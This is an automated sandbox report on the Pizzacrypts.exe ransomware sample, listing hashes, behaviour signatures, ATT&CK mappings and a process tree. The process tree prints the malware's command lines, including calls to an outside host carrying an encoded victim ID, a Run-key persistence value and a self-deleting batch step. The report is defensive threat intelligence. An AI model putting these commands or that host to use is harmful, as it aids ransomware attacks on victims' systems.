c96b41fac848211321861fcf957e5f475a950c56f9024f792e5c9584f1fbd3ef

Analysis

max time kernel
189s
max time network
143s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
22-11-2024 03:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Pizzacrypts.exe
Size

168KB
MD5

00f57ac8b384f7d21eeade87446659fd
SHA1

ee0204b4cda5cee612b2f62345e0bab6b125c1c4
SHA256

d6818864dc9e10b15c88aca4d1e8fd971eff43572beba3001fd6c96028afd9f3
SHA512

f20f0049a941f7d4d7b643980a11966daed9b4a3f6b961824da7619321a62b3bc70b19955c1ccea4eb3de0641aef8a8a76679bb280d419b65b0dfa7698c5d4b6
SSDEEP

3072:3rw+G6t3JFCGHMszzDLfnxGwbg2/kfkN8LCo59e559c:3c635sszzDrxIc2xK9c

Score

9^/10

discovery persistence ransomware spyware stealer upx

Malware Config

Signatures

Renames multiple (451) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

5476 cmd.exe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

pid	process
5476	cmd.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Pizzacrypts.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\KfjH1x6B3AcgWcCf = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Pizzacrypts.exe"	Pizzacrypts.exe

Enumerates connected drives 3 TTPs 21 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Pizzacrypts.exe

description	ioc	process
File opened (read-only)	\??\J:	Pizzacrypts.exe
File opened (read-only)	\??\Y:	Pizzacrypts.exe
File opened (read-only)	\??\U:	Pizzacrypts.exe
File opened (read-only)	\??\P:	Pizzacrypts.exe
File opened (read-only)	\??\O:	Pizzacrypts.exe
File opened (read-only)	\??\X:	Pizzacrypts.exe
File opened (read-only)	\??\T:	Pizzacrypts.exe
File opened (read-only)	\??\M:	Pizzacrypts.exe
File opened (read-only)	\??\H:	Pizzacrypts.exe
File opened (read-only)	\??\G:	Pizzacrypts.exe
File opened (read-only)	\??\S:	Pizzacrypts.exe
File opened (read-only)	\??\R:	Pizzacrypts.exe
File opened (read-only)	\??\N:	Pizzacrypts.exe
File opened (read-only)	\??\K:	Pizzacrypts.exe
File opened (read-only)	\??\L:	Pizzacrypts.exe
File opened (read-only)	\??\I:	Pizzacrypts.exe
File opened (read-only)	\??\E:	Pizzacrypts.exe
File opened (read-only)	\??\Z:	Pizzacrypts.exe
File opened (read-only)	\??\W:	Pizzacrypts.exe
File opened (read-only)	\??\V:	Pizzacrypts.exe
File opened (read-only)	\??\Q:	Pizzacrypts.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

Pizzacrypts.exe

description pid process target process

PID 2172 set thread context of 2520 2172 Pizzacrypts.exe Pizzacrypts.exe

description	pid	process	target process
PID 2172 set thread context of 2520	2172	Pizzacrypts.exe	Pizzacrypts.exe

UPX packed file 55 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral7/memory/2520-5-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-15-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-16-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-18-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-17-0x0000000000400000-0x000000000041C000-memory.dmp	upx
behavioral7/memory/2520-8-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-14-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-12-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-9-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-7-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-19-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-21-0x0000000000400000-0x000000000041C000-memory.dmp	upx
behavioral7/memory/2520-45-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-46-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-53-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-57-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-55-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-51-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-73-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-63-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-61-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-67-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-60-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-100-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-104-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-110-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-114-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-106-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-87-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-101-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-128-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-126-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-95-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-2302-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-2301-0x0000000000400000-0x000000000041C000-memory.dmp	upx
behavioral7/memory/2520-92-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-122-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-85-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-118-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-112-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-109-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-105-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-99-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-93-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-120-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-86-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-83-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-81-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-77-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-75-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-56-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-79-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-54-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-52-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx
behavioral7/memory/2520-71-0x0000000000400000-0x0000000000EF0000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

IEXPLORE.EXEcmd.exePizzacrypts.exePizzacrypts.execmd.exeIEXPLORE.EXEcmd.exeNOTEPAD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Pizzacrypts.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Pizzacrypts.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NOTEPAD.EXE

Modifies Internet Explorer settings 1 TTPs 39 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "438408502"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a907cc1344750743988d8bab481dbfbf0000000002000000000010660000000100002000000024c2adf3467a719a2af92e19ea89043b033a5fb4963b577c7256cee9c351ed2c000000000e800000000200002000000042094b70efa9dcd58a4af2a2ef1f3c111ffd150e28cbf6812660723fa4164392200000009f4b8d27b32e53f68e627b40e49e10d111fa53c485d3db4797b5372f1b94d3fd400000003bfc409fe580a68d74b94744271ba5218e1f68813087f86adc63bc3dcec6f7d13a4a8617e356349d322f0eeb410ddd076dd37b5603623cc1a64802698f6670c7	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{10EDC1F1-A883-11EF-8F09-6AE97CBD91D4} = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a907cc1344750743988d8bab481dbfbf0000000002000000000010660000000100002000000090cb398485f0314592dfb83e8667cb95cb5ee894d965033ae3b6a45437d9db37000000000e800000000200002000000027f3415caf1390b78d91cf37e275b54781aad8381f2b5d1de9689fd9b791d43b900000006d5470b1ae25e7f547349b1174d3cb4a79e41a6dd219e23142d0e5d741eb3711feae0e52eb9f8a13e2f075ff609bf5c850510fbffd4ab02fcd0b7584c716ea295565137b4e1141fb6e4727140979e90112b6f9a78700ba20c4b42466911faacdcf4f679635538c25fa72836d9acdbf8cd612a5289a02afabff667f4cf47ced0a6d0bc32f9e738abddd5e31a73236e5ae400000009407c07674d927a22a131df07dcc4ce45f74c2988d113800641f2a084bc2fa8b217915c44ed9aa7db6c8691aaaef49502f46794d016bb6134364331f0311c8b0	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 007ccfe28f3cdb01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

6016 NOTEPAD.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

Pizzacrypts.exeiexplore.exe

pid process

2172 Pizzacrypts.exe
1928 iexplore.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

vssvc.exe

description pid process

Token: SeBackupPrivilege 1748 vssvc.exe
Token: SeRestorePrivilege 1748 vssvc.exe
Token: SeAuditPrivilege 1748 vssvc.exe
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

iexplore.exeNOTEPAD.EXE

pid process

1928 iexplore.exe
6016 NOTEPAD.EXE

pid	process
6016	NOTEPAD.EXE

pid	process
2172	Pizzacrypts.exe
1928	iexplore.exe

description	pid	process
Token: SeBackupPrivilege	1748	vssvc.exe
Token: SeRestorePrivilege	1748	vssvc.exe
Token: SeAuditPrivilege	1748	vssvc.exe

Suspicious use of SetWindowsHookEx 10 IoCs

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXE

pid	process
1928	iexplore.exe
1928	iexplore.exe
1720	IEXPLORE.EXE
1720	IEXPLORE.EXE
1720	IEXPLORE.EXE
1720	IEXPLORE.EXE
4676	IEXPLORE.EXE
4676	IEXPLORE.EXE
4676	IEXPLORE.EXE
4676	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 39 IoCs

Processes:

Pizzacrypts.exePizzacrypts.execmd.exeiexplore.exe

description	pid	process	target process
PID 2172 wrote to memory of 2520	2172	Pizzacrypts.exe	Pizzacrypts.exe
PID 2172 wrote to memory of 2520	2172	Pizzacrypts.exe	Pizzacrypts.exe
PID 2172 wrote to memory of 2520	2172	Pizzacrypts.exe	Pizzacrypts.exe
PID 2172 wrote to memory of 2520	2172	Pizzacrypts.exe	Pizzacrypts.exe
PID 2172 wrote to memory of 2520	2172	Pizzacrypts.exe	Pizzacrypts.exe
PID 2172 wrote to memory of 2520	2172	Pizzacrypts.exe	Pizzacrypts.exe
PID 2172 wrote to memory of 2520	2172	Pizzacrypts.exe	Pizzacrypts.exe
PID 2172 wrote to memory of 2520	2172	Pizzacrypts.exe	Pizzacrypts.exe
PID 2172 wrote to memory of 2520	2172	Pizzacrypts.exe	Pizzacrypts.exe
PID 2172 wrote to memory of 2520	2172	Pizzacrypts.exe	Pizzacrypts.exe
PID 2172 wrote to memory of 2520	2172	Pizzacrypts.exe	Pizzacrypts.exe
PID 2520 wrote to memory of 1588	2520	Pizzacrypts.exe	cmd.exe
PID 2520 wrote to memory of 1588	2520	Pizzacrypts.exe	cmd.exe
PID 2520 wrote to memory of 1588	2520	Pizzacrypts.exe	cmd.exe
PID 2520 wrote to memory of 1588	2520	Pizzacrypts.exe	cmd.exe
PID 1588 wrote to memory of 1928	1588	cmd.exe	iexplore.exe
PID 1588 wrote to memory of 1928	1588	cmd.exe	iexplore.exe
PID 1588 wrote to memory of 1928	1588	cmd.exe	iexplore.exe
PID 1588 wrote to memory of 1928	1588	cmd.exe	iexplore.exe
PID 1928 wrote to memory of 1720	1928	iexplore.exe	IEXPLORE.EXE
PID 1928 wrote to memory of 1720	1928	iexplore.exe	IEXPLORE.EXE
PID 1928 wrote to memory of 1720	1928	iexplore.exe	IEXPLORE.EXE
PID 1928 wrote to memory of 1720	1928	iexplore.exe	IEXPLORE.EXE
PID 2520 wrote to memory of 5648	2520	Pizzacrypts.exe	cmd.exe
PID 2520 wrote to memory of 5648	2520	Pizzacrypts.exe	cmd.exe
PID 2520 wrote to memory of 5648	2520	Pizzacrypts.exe	cmd.exe
PID 2520 wrote to memory of 5648	2520	Pizzacrypts.exe	cmd.exe
PID 2520 wrote to memory of 6016	2520	Pizzacrypts.exe	NOTEPAD.EXE
PID 2520 wrote to memory of 6016	2520	Pizzacrypts.exe	NOTEPAD.EXE
PID 2520 wrote to memory of 6016	2520	Pizzacrypts.exe	NOTEPAD.EXE
PID 2520 wrote to memory of 6016	2520	Pizzacrypts.exe	NOTEPAD.EXE
PID 1928 wrote to memory of 4676	1928	iexplore.exe	IEXPLORE.EXE
PID 1928 wrote to memory of 4676	1928	iexplore.exe	IEXPLORE.EXE
PID 1928 wrote to memory of 4676	1928	iexplore.exe	IEXPLORE.EXE
PID 1928 wrote to memory of 4676	1928	iexplore.exe	IEXPLORE.EXE
PID 2520 wrote to memory of 5476	2520	Pizzacrypts.exe	cmd.exe
PID 2520 wrote to memory of 5476	2520	Pizzacrypts.exe	cmd.exe
PID 2520 wrote to memory of 5476	2520	Pizzacrypts.exe	cmd.exe
PID 2520 wrote to memory of 5476	2520	Pizzacrypts.exe	cmd.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\Pizzacrypts.exe
"C:\Users\Admin\AppData\Local\Temp\Pizzacrypts.exe"
1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2172
- C:\Users\Admin\AppData\Local\Temp\Pizzacrypts.exe
  "C:\Users\Admin\AppData\Local\Temp\Pizzacrypts.exe"
  2⤵
  - Adds Run key to start application
  - Enumerates connected drives
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2520
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "start http://avtoship.com/123/index.php?u=8ACEFC592BC56C857CEE0A84BD5DAC83481702EF19B3895B7BCACACBE88C19F6EA3AC91B6D773FC0CDE4B7AF4C361D5602E0827AC81D9B58926F9C9A63821E4BBC3632758B44BC56165F7CC3A79B068059B2E7B52ADEBCC15E5AD363FEF00218380DD0714E3C9DDD52D3AEC7998CEA643E76F9F12C5DAC1549AAA32132E3300108725EC294FFE2E3324EF01270206C7AD588E60DF6A169164ED68E22692F3825AB37D30EF7B427745584B8E7F831BEED7CC963B57E8712DE88C4BB47C7EEE75845"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1588
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://avtoship.com/123/index.php?u=8ACEFC592BC56C857CEE0A84BD5DAC83481702EF19B3895B7BCACACBE88C19F6EA3AC91B6D773FC0CDE4B7AF4C361D5602E0827AC81D9B58926F9C9A63821E4BBC3632758B44BC56165F7CC3A79B068059B2E7B52ADEBCC15E5AD363FEF00218380DD0714E3C9DDD52D3AEC7998CEA643E76F9F12C5DAC1549AAA32132E3300108725EC294FFE2E3324EF01270206C7AD588E60DF6A169164ED68E22692F3825AB37D30EF7B427745584B8E7F831BEED7CC963B57E8712DE88C4BB47C7EEE75845
      4⤵
      Modifies Internet Explorer settings
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1928
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1928 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1720
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1928 CREDAT:603152 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:4676
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "start http://avtoship.com/123/index.php?r=8ACEFC592BC56C857CEE0A84BD5DAC8045124AA16CB082583785"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5648
- - C:\Windows\SysWOW64\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\317FKF8LCG90FUIAT.txt
    3⤵
    - System Location Discovery: System Language Discovery
    - Opens file in notepad (likely ransom note)
    - Suspicious use of FindShellTrayWindow
    PID:6016
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\Pizzacrypts.exe.bat" "
    3⤵
    - Deletes itself
    - System Location Discovery: System Language Discovery
    PID:5476

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\[email protected]

Filesize
4B

MD5
b485167c5b0e59d47009a16f90fe2659

SHA1
891ebccd5baa32daed16fb5a0825ca7a4464931f

SHA256
db44b8db4f05d720ef1a57abadeed0c164d47b17416c7dd7d136d8f10fba91c9

SHA512
665e3fcbd83b7876dd1dc7f34fadd8669debdfab8962bdce3b72b08139a75ef157c4f4c3b90ea9c1f20637bb4f2a29091d9186987d22c7d23428a2e7ccf80bd4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
a6814275339c3ed25f575e68b323b2eb

SHA1
4f00c5a1adda29f0645c8ba212ac4358a07665bf

SHA256
bcb2294f23c34cb6a8204ad32d53768574fed9f6328130e5a43ee22cb2fed2a3

SHA512
d44f7ce43ba7618e1b35240070f64e25115743dc2693347abd7df20fa6594e04baf3899c855923d4cb19464111a3a133c8a5d6f6afb8ab55429f51349aef69ee

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
386d6d078bab559ef5033112213134ca

SHA1
c688608b3e2c66c45df957a894368e7239898350

SHA256
ad1207e5ef6beb10739c2c3510cc6f219839d213f9c22483089580eabdf8bbb6

SHA512
beda558c6bf8798a08b0d28040b6faf27fad359d79fc801b7949aeeb3519e827355123fcf797a6ebb5ff661675c29b40ff2db92bb98e8826fb5ebdd6709a99af

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
45a9e709fb67e9f3c433873a79c45523

SHA1
a5ce8148f9132a59be9290d441908e5e1a7a6200

SHA256
01add89fa998bcd8d33d9e299cb484e23c4d0290a5280f6159f30b9e32309e7a

SHA512
2010299c34685f3fd83476acf4fd49373b4a2631ce531ba67a254035e99fa8161d294063daa3e40c3d722ddc4511efd951c684d6449a32e3c4d4598a82088c9a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
6426327fc31fb8c507de02a132c1f49d

SHA1
bce8fc4cecbf868af46b9922c275af89a610bd0d

SHA256
73c9f92a5889aab8e8c6c3753c6365de6b47a06493b11227b5d765b76b3cf28b

SHA512
3988794ebe033c1daa6082ce15890d6b8ca03c271c6ffe2f1dd64f275a3d9931795685523ec9e7c667e6cee73d183644e8a1dc23e779294f6ab603cc56124732

Download Submit
